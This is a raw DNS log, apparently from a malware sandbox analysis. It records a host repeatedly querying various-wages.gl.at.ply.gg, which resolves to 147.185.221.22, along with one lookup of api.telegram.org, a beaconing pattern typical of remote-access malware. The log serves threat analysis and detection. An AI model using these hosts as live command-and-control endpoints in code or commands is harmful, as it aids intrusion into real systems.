                                                            Sep 25, 2024 08:33:01.541975975 CEST192.168.2.228.8.8.80x9a19Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.650716066 CEST192.168.2.228.8.8.80x1f74Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.657495022 CEST192.168.2.228.8.8.80x1f74Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.664479971 CEST192.168.2.228.8.8.80x1f74Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.671051979 CEST192.168.2.228.8.8.80x1f74Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.678002119 CEST192.168.2.228.8.8.80x1f74Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.814707994 CEST192.168.2.228.8.8.80xed82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.822163105 CEST192.168.2.228.8.8.80xed82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.829304934 CEST192.168.2.228.8.8.80xed82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.836836100 CEST192.168.2.228.8.8.80xed82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:01.844233990 CEST192.168.2.228.8.8.80xed82Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:05.349203110 CEST192.168.2.228.8.8.80x6807Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:05.358597994 CEST192.168.2.228.8.8.80x6807Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:05.365341902 CEST192.168.2.228.8.8.80x6807Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:05.372787952 CEST192.168.2.228.8.8.80x6807Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:05.379395008 CEST192.168.2.228.8.8.80x6807Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:08.876607895 CEST192.168.2.228.8.8.80x31bdStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:09.095382929 CEST192.168.2.228.8.8.80x31bdStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:13.880588055 CEST192.168.2.228.8.8.80x6dcaStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:13.887178898 CEST192.168.2.228.8.8.80x6dcaStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:13.894483089 CEST192.168.2.228.8.8.80x6dcaStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:13.901243925 CEST192.168.2.228.8.8.80x6dcaStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:13.907952070 CEST192.168.2.228.8.8.80x6dcaStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:14.032226086 CEST192.168.2.228.8.8.80x4736Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:14.039964914 CEST192.168.2.228.8.8.80x4736Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:14.047360897 CEST192.168.2.228.8.8.80x4736Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:14.053847075 CEST192.168.2.228.8.8.80x4736Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:14.060278893 CEST192.168.2.228.8.8.80x4736Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.079668045 CEST192.168.2.228.8.8.80x3604Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.086178064 CEST192.168.2.228.8.8.80x3604Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.092776060 CEST192.168.2.228.8.8.80x3604Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.099344015 CEST192.168.2.228.8.8.80x3604Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.106741905 CEST192.168.2.228.8.8.80x3604Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.227175951 CEST192.168.2.228.8.8.80x9b12Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.233823061 CEST192.168.2.228.8.8.80x9b12Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.240334034 CEST192.168.2.228.8.8.80x9b12Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.247565031 CEST192.168.2.228.8.8.80x9b12Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.254093885 CEST192.168.2.228.8.8.80x9b12Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.372754097 CEST192.168.2.228.8.8.80x4dc7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.380732059 CEST192.168.2.228.8.8.80x4dc7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.387242079 CEST192.168.2.228.8.8.80x4dc7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.393675089 CEST192.168.2.228.8.8.80x4dc7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.400473118 CEST192.168.2.228.8.8.80x4dc7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.517427921 CEST192.168.2.228.8.8.80xcbd8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.524848938 CEST192.168.2.228.8.8.80xcbd8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.531373024 CEST192.168.2.228.8.8.80xcbd8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:18.537982941 CEST192.168.2.228.8.8.80xcbd8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.593125105 CEST192.168.2.228.8.8.80x8b97Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.807905912 CEST192.168.2.228.8.8.80x8b97Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.845366001 CEST192.168.2.228.8.8.80x8b97Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.852489948 CEST192.168.2.228.8.8.80x8b97Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.859565973 CEST192.168.2.228.8.8.80x8b97Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.976861000 CEST192.168.2.228.8.8.80xd8c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.983252048 CEST192.168.2.228.8.8.80xd8c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.989979029 CEST192.168.2.228.8.8.80xd8c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:22.997534990 CEST192.168.2.228.8.8.80xd8c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.005250931 CEST192.168.2.228.8.8.80xd8c9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.115525007 CEST192.168.2.228.8.8.80x8430Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.122200012 CEST192.168.2.228.8.8.80x8430Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.129507065 CEST192.168.2.228.8.8.80x8430Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.136035919 CEST192.168.2.228.8.8.80x8430Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.143282890 CEST192.168.2.228.8.8.80x8430Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.677670956 CEST192.168.2.228.8.8.80x1f1fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.701648951 CEST192.168.2.228.8.8.80x1f1fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.709336042 CEST192.168.2.228.8.8.80x1f1fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.717345953 CEST192.168.2.228.8.8.80x1f1fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.724184990 CEST192.168.2.228.8.8.80x1f1fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.835678101 CEST192.168.2.228.8.8.80xfc20Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.843081951 CEST192.168.2.228.8.8.80xfc20Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.852916002 CEST192.168.2.228.8.8.80xfc20Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.860075951 CEST192.168.2.228.8.8.80xfc20Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:23.867595911 CEST192.168.2.228.8.8.80xfc20Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.941859007 CEST192.168.2.228.8.8.80x8305Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.948400021 CEST192.168.2.228.8.8.80x8305Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.955303907 CEST192.168.2.228.8.8.80x8305Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.961864948 CEST192.168.2.228.8.8.80x8305Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:26.968430042 CEST192.168.2.228.8.8.80x8305Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.081401110 CEST192.168.2.228.8.8.80x16caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.089015961 CEST192.168.2.228.8.8.80x16caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.096415997 CEST192.168.2.228.8.8.80x16caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.103593111 CEST192.168.2.228.8.8.80x16caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:27.111481905 CEST192.168.2.228.8.8.80x16caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:31.687835932 CEST192.168.2.228.8.8.80x1b36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:31.695631027 CEST192.168.2.228.8.8.80x1b36Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.848933935 CEST192.168.2.228.8.8.80x66f5Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.855238914 CEST192.168.2.228.8.8.80x66f5Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.861643076 CEST192.168.2.228.8.8.80x66f5Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.867877007 CEST192.168.2.228.8.8.80x66f5Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.874496937 CEST192.168.2.228.8.8.80x66f5Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:35.987842083 CEST192.168.2.228.8.8.80xb2e8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.122479916 CEST192.168.2.228.8.8.80xb2e8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.129084110 CEST192.168.2.228.8.8.80xb2e8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.135571003 CEST192.168.2.228.8.8.80xb2e8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.142093897 CEST192.168.2.228.8.8.80xb2e8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.279022932 CEST192.168.2.228.8.8.80x6a2fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.285670042 CEST192.168.2.228.8.8.80x6a2fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.293955088 CEST192.168.2.228.8.8.80x6a2fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.302191019 CEST192.168.2.228.8.8.80x6a2fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.311194897 CEST192.168.2.228.8.8.80x6a2fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.421636105 CEST192.168.2.228.8.8.80x6570Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.428298950 CEST192.168.2.228.8.8.80x6570Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.434742928 CEST192.168.2.228.8.8.80x6570Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.441690922 CEST192.168.2.228.8.8.80x6570Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.448357105 CEST192.168.2.228.8.8.80x6570Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.562105894 CEST192.168.2.228.8.8.80x64ecStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.568948030 CEST192.168.2.228.8.8.80x64ecStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.575613022 CEST192.168.2.228.8.8.80x64ecStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.582161903 CEST192.168.2.228.8.8.80x64ecStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.591288090 CEST192.168.2.228.8.8.80x64ecStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.706640959 CEST192.168.2.228.8.8.80xe151Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.713443041 CEST192.168.2.228.8.8.80xe151Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.722259045 CEST192.168.2.228.8.8.80xe151Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.731323957 CEST192.168.2.228.8.8.80xe151Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.739964008 CEST192.168.2.228.8.8.80xe151Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.858458996 CEST192.168.2.228.8.8.80x4150Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:36.868211985 CEST192.168.2.228.8.8.80x4150Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:41.683702946 CEST192.168.2.228.8.8.80x4c9aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:41.691356897 CEST192.168.2.228.8.8.80x4c9aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.431164980 CEST192.168.2.228.8.8.80x4dd1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.439239979 CEST192.168.2.228.8.8.80x4dd1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.446563959 CEST192.168.2.228.8.8.80x4dd1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.453293085 CEST192.168.2.228.8.8.80x4dd1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.459824085 CEST192.168.2.228.8.8.80x4dd1Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.604046106 CEST192.168.2.228.8.8.80xcb28Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.613624096 CEST192.168.2.228.8.8.80xcb28Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.621815920 CEST192.168.2.228.8.8.80xcb28Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.629786968 CEST192.168.2.228.8.8.80xcb28Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:46.637655020 CEST192.168.2.228.8.8.80xcb28Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.765731096 CEST192.168.2.228.8.8.80x65c2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.773400068 CEST192.168.2.228.8.8.80x65c2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.780992031 CEST192.168.2.228.8.8.80x65c2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.789331913 CEST192.168.2.228.8.8.80x65c2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:49.796061039 CEST192.168.2.228.8.8.80x65c2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.459211111 CEST192.168.2.228.8.8.80x5407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.465974092 CEST192.168.2.228.8.8.80x5407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.475719929 CEST192.168.2.228.8.8.80x5407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.482475996 CEST192.168.2.228.8.8.80x5407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:53.489233971 CEST192.168.2.228.8.8.80x5407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.314479113 CEST192.168.2.228.8.8.80x82fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.323153019 CEST192.168.2.228.8.8.80x82fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.331301928 CEST192.168.2.228.8.8.80x82fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.338958979 CEST192.168.2.228.8.8.80x82fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.347089052 CEST192.168.2.228.8.8.80x82fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.469918966 CEST192.168.2.228.8.8.80x831eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.477730989 CEST192.168.2.228.8.8.80x831eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.485352039 CEST192.168.2.228.8.8.80x831eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.492676973 CEST192.168.2.228.8.8.80x831eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.499958992 CEST192.168.2.228.8.8.80x831eStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.623776913 CEST192.168.2.228.8.8.80xb795Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.632060051 CEST192.168.2.228.8.8.80xb795Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.639250040 CEST192.168.2.228.8.8.80xb795Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.647643089 CEST192.168.2.228.8.8.80xb795Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.663314104 CEST192.168.2.228.8.8.80xb795Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.782957077 CEST192.168.2.228.8.8.80x811bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.789355993 CEST192.168.2.228.8.8.80x811bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.796920061 CEST192.168.2.228.8.8.80x811bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.803672075 CEST192.168.2.228.8.8.80x811bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.810153008 CEST192.168.2.228.8.8.80x811bStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.924375057 CEST192.168.2.228.8.8.80x9adbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.931221008 CEST192.168.2.228.8.8.80x9adbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.937508106 CEST192.168.2.228.8.8.80x9adbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.944617987 CEST192.168.2.228.8.8.80x9adbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:33:58.951076031 CEST192.168.2.228.8.8.80x9adbStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 25, 2024 08:30:06.926343918 CEST8.8.8.8192.168.2.220xee91No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:08.231156111 CEST8.8.8.8192.168.2.220xfc62No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:12.528614044 CEST8.8.8.8192.168.2.220xf206No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:18.425621033 CEST8.8.8.8192.168.2.220xcfdNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:23.745908976 CEST8.8.8.8192.168.2.220xc4a3No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:29.017741919 CEST8.8.8.8192.168.2.220x28f2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:32.701456070 CEST8.8.8.8192.168.2.220x3adNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:38.309539080 CEST8.8.8.8192.168.2.220xd0f6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:41.543303013 CEST8.8.8.8192.168.2.220x30b7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:44.969809055 CEST8.8.8.8192.168.2.220xb020No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:48.684670925 CEST8.8.8.8192.168.2.220x11d4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:53.323092937 CEST8.8.8.8192.168.2.220xb46fNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:57.560218096 CEST8.8.8.8192.168.2.220xf619No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:02.223879099 CEST8.8.8.8192.168.2.220x1107No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:05.703425884 CEST8.8.8.8192.168.2.220x67e4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:09.887135983 CEST8.8.8.8192.168.2.220x55bdNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:09.894753933 CEST8.8.8.8192.168.2.220x55bdNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.643105030 CEST8.8.8.8192.168.2.220xfc67No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
